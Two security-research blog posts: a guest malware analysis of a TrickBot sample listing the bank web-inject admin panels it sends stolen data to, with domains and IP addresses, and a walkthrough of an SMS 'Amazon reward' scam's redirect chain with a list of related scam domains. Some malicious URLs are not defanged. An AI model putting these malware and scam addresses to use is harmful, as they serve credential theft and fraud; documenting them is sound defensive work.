Saturday, June 29, 2019

TrickBot: New Injects, New Host


What’s in the Name: Call it IcedID or TrickBot? Tell that to a security researcher (Arsh Arora in this case) and watch them RANT

(Gar-note: today's blog post is a guest blog from malware analyst, Arsh Arora...) 

Today’s post starts with an interesting link from Dawid Golak's Medium post: “IcedID aka# Bokbot Analysis with Ghidra” which mentions that IcedID is dropping TrickBot. Although the article is about IcedID, it gets confusing quickly, because the researcher focused on finding artifacts for IcedID instead finds TrickBot artifacts. A big question for the security industry still remain is to how to classify the malware from the originator or the binary that is being dropped. We followed up on the sample he mentioned and saw the same thing.  This is definitely Trickbot.

First Stage – Sample Collection from Virus Total Intelligence

In the "AnyRun Analysis" linked to by Dawid, the TrickBot binary was downloaded from “54.36.218[.]96 (slash) tin[.]exe



Fig 1: TrickBot Sample

Second Stage – Sample Execution

After the execution in a virtual environment, I was able to see TrickBot behavior similar to what we have documented in the past in our post "Trickbot's New Magic Trick: Sending Spam":

A large number of config files and dlls were loaded into the Roaming/netcache/Data, a  unique behavior of the TrickBot binary.

Fig 2: Configs and Dlls Loaded

Third Stage – Open Firefox and visit different Bank website

It is often the case that to get any banking trojan to co-operate with the researcher, some initiation from the researcher side is needed. Due to past experience, I have learned that one needs to open up a browser and visit different bank websites to activate the banking trojan. The trojan resists until instigated by visits to these pages. I visited close to 20 different bank websites and was able to obtain injects from 7 of those bank websites. The injects and admin login panels of the websites are as follows.

Name of  Bank
Admin Login Panel
IP
Location
Bank of
America
https://aefaldnessliverhearted[.]com/load/
185.242.6.245
AS9009, Prague
Chase
https://aefaldnessliverhearted[.]com/load/
185.242.6.245
AS9009, Prague
Citi
https://remirollerros[.]com/legr/
109.234.37.246
AS48282, RU
Usaa
https://onlylocaltrade[.]com/lob.php
185.87.187.198
AS48635,NL
WellsFargo
https://wellsfargostrade.com/2wells2
185.36.189.143
AS50673, NL
PNC
https://wellsfargostrade[.]com/pncadmin/index.php
185.36.189.143
AS50673, NL
53 Bank
https://wellsfargostrade[.]com/53repadmin2
185.36.189.143
AS50673, NL

When infected, viewing the source code while visiting one of the banks is all that is needed to identify the data exfiltration destination.  Some examples follow from this infection run:

BankofAmerica

Fig 3: BoA Web Inject

Chase

Fig 4: Chase Web Inject

Fig 5: BoA and Chase Admin Panel

Citi

Fig 6: Citi Web Inject

Fig 7: Citi Login Panel

USAA


Fig 8: USAA Web Inject

WellsFargo

Fig 9: WellsFargo Web Inject

Fig 10: WellsFargo Admin Panel

PNC

Fig 11: PNC Web Inject

Fig 12: PNC Admin Panel

53 Bank

Fig 13: 53 Bank Web Inject

Fig 14: 53 Bank Admin Panel


For more details please contact Arsh Arora (ararora at uab.edu) or Gary Warner (gar at uab.edu) at UAB. Please note:  Arsh is defending his PhD this summer and looking for new opportunities.


Saturday, June 01, 2019

SMS Phish? Amazon Reward!

Are you getting text messages about winning prizes at Amazon?

I got one today with the following text from a VOIP-to-SMS number: 1 (410) 200-910

The text was:
 "FRM: You have a New Amazon Reward! MSG: http://dmkr3h.com/njngyw"

I threw up a Virtual Machine to check the destination, and got a meaningless echo of the domain name:



The problem, of course, was that they knew I was supposed to be on a cell phone, since they sent me an SMS.  No problem.  Let's make my Windows Chrome Browser a Cell Phone: 

Ok.  Now I'm a Firefox browser on an Android Mobile phone.  Let's try again.  Much better!  The CloudFlare hosted "dmkr3h" now forwards me to "simple-clubs.com" which is a CNAME alias to "seempts-explegal[.]com (35.169.148.30) " which passes my origin and affiliate data to chargingmilkshop[.]com (51.75.46.9), which forwards me to "winopinions[.]com (51.75.46.11)" which shows me this!


Before I take my Survey, I hit my "Back" button, just to see what happens, because often there are traps about such things.  Sure enough, hitting the "Back" took me to an ad totally unrelated to my Amazon Prize:


As much as I'd like to be Ketogenically Accelerated, I decided to go back to my original URL from the phone.  This time I landed at "ZoneOpinions[.]com" instead of WinOpinions, but since I was still on the same IP address, I decided to keep going and take the survey this time.  Here are my five Survey Questions:






OK, now for the excitement!  My big Amazon Reward is about to be revealed, right?





Hmmm... do I want a larger penis, a flatter belly, or a $780 watch?  I think I'll take the $780 watch, since its free and all ... 

Each time I click "Claim Reward" I get sent through a "1592track[.]com" redirector:
Which then forwards me to one of its randomly selected possible fulfillment domains ... 

getemergencygear[.]com
Odd.  Clicking on the watch takes me to a site for a free Tactical Flashlight. Oh well.  The point of this exercise is to feed some of my spam traps anyway.  We'll give them one of our spam trap email addresses just to see what they begin spamming to me. 

I wonder if ClickBank is complicit in these scams?
Since I'm not actually going to give them my credit card information, I'll see whether I get the same spam by submitting my address info for CBD Oil and Male Enhancement anyway.  Where do those clicks take me?
tryhealthoffer [.] com 


(a closer look at the Affiliate ID = 600080)

healthchoicev2 [.]com selling Primacin XL 


I saved which Spam Trap email I fed to each of the sites above.  If I start getting spam on them (none of them have existed before an hour ago and have never received any message prior to being fed to these sites) I'll do a follow-up post.

While trying to decide if this is something to share with my friends at the Federal Trade Commission, I decided to check what country these domains are hosted in ... Poland ... 

ipinfo.io/51.75.46.9 ==> OVH SAS in Poland.
According to the very useful tool at RiskIQ, it looks like 77 new domains stood up on this IP address about two days ago:
https://community.riskiq.com/search/51.75.46.9
We went ahead and exported that list so we could save a record of what other domains were there.  Looks like there are MANY alternative domains for doing the same sort of things ... 


resolvefirstSeenlastSeen
actionopinion.com5/30/20195/31/2019
airopinions.com5/30/20195/31/2019
alertandfocusednow.com5/30/20195/31/2019
alertandsharp.com5/30/20195/31/2019
blazingtea.com5/30/20195/31/2019
brainexpandnow.com5/30/20195/31/2019
brainexpandtoday.com5/30/20195/31/2019
brainexpandtonight.com5/30/20195/31/2019
cellopinion.com5/29/20195/31/2019
centeropinion.com5/30/20195/31/2019
chargingmilkshake.com5/30/20196/1/2019
companyopinions.com5/30/20195/31/2019
connectexclusive.com5/25/20195/31/2019
corpprogram.com5/30/20195/31/2019
dataopinions.com5/30/20195/31/2019
dreamopinions.com5/30/20196/1/2019
exclusivetrendingreport.com5/25/20195/31/2019
fitketonow.com5/30/20195/31/2019
fitketotoday.com5/30/20195/31/2019
fullyhardagain.com5/30/20195/31/2019
fullyhardtonight.com5/30/20195/31/2019
hardandlongagain.com5/30/20195/31/2019
hardandlonger.com5/30/20195/31/2019
hotbreakingreports.com5/30/20195/31/2019
hotnewstonight.com5/30/20195/31/2019
hotviralreports.com5/30/20195/31/2019
latestbreakingreport.com5/30/20195/31/2019
latestviralreport.com5/30/20195/31/2019
learningopinion.com5/30/20195/31/2019
lineprogram.com5/30/20195/31/2019
linkopinions.com5/30/20195/31/2019
linksprogram.com5/30/20195/31/2019
longandhardagain.com5/30/20195/31/2019
longandhardtonight.com5/30/20195/31/2019
longerhardernow.com5/30/20195/31/2019
lookprogram.com5/30/20195/31/2019
lumberingsoda.com5/30/20195/31/2019
magicopinions.com5/30/20195/31/2019
matchopinion.com5/30/20195/31/2019
maxopinions.com5/30/20195/31/2019
mindexpandnow.com5/30/20195/31/2019
monsterprogram.com5/30/20195/31/2019
newbreakingreport.com5/30/20195/31/2019
newbreakingreports.com5/30/20195/31/2019
newtrendingreport.com5/30/20195/31/2019
newtrendingreports.com5/30/20195/31/2019
newviralreport.com5/29/20195/31/2019
portalopinion.com5/30/20195/31/2019
projectopinions.com5/30/20195/31/2019
romanwatermelon.com5/25/20195/31/2019
rushingcoffee.com5/30/20195/31/2019
saveopinion.com5/30/20195/31/2019
shesreadytonight.com5/30/20195/31/2019
shoppingopinions.com5/30/20195/31/2019
slimketonow.com5/30/20195/31/2019
slimketotoday.com5/30/20195/31/2019
slimketotonight.com5/30/20195/31/2019
slowseltzer.com5/30/20195/31/2019
sluggishjuice.com5/29/20195/31/2019
sprintingspirits.com5/30/20195/31/2019
swiftespresso.com5/30/20195/31/2019
teamopinions.com5/30/20195/31/2019
thenewstrends.com5/30/20195/31/2019
tightketonow.com5/30/20195/31/2019
tightketotoday.com5/30/20195/31/2019
tightketotonight.com5/30/20195/31/2019
todaysbreakingstory.com5/25/20195/31/2019
tonightsbreakingstory.com5/25/20195/31/2019
totalbreakingnews.com5/30/20195/31/2019
touchopinion.com5/30/20195/31/2019
trendstonight.com5/30/20195/31/2019
whirlingmilk.com5/30/20195/31/2019
winopinions.com5/30/20196/1/2019
yournewsbreaks.com5/30/20195/31/2019
yournewstrends.com5/30/20195/31/2019
zoneopinions.com5/30/20195/31/2019
zoomingcider.com5/30/20195/31/2019

Many of these domains are proven to be interchangeable, as long as your user agent is right. Pasting the "path/file/parameters" from one site to another of the same type usually works.

Conclusion?  Don't think I'm going to get my Amazon Prize.  Darn.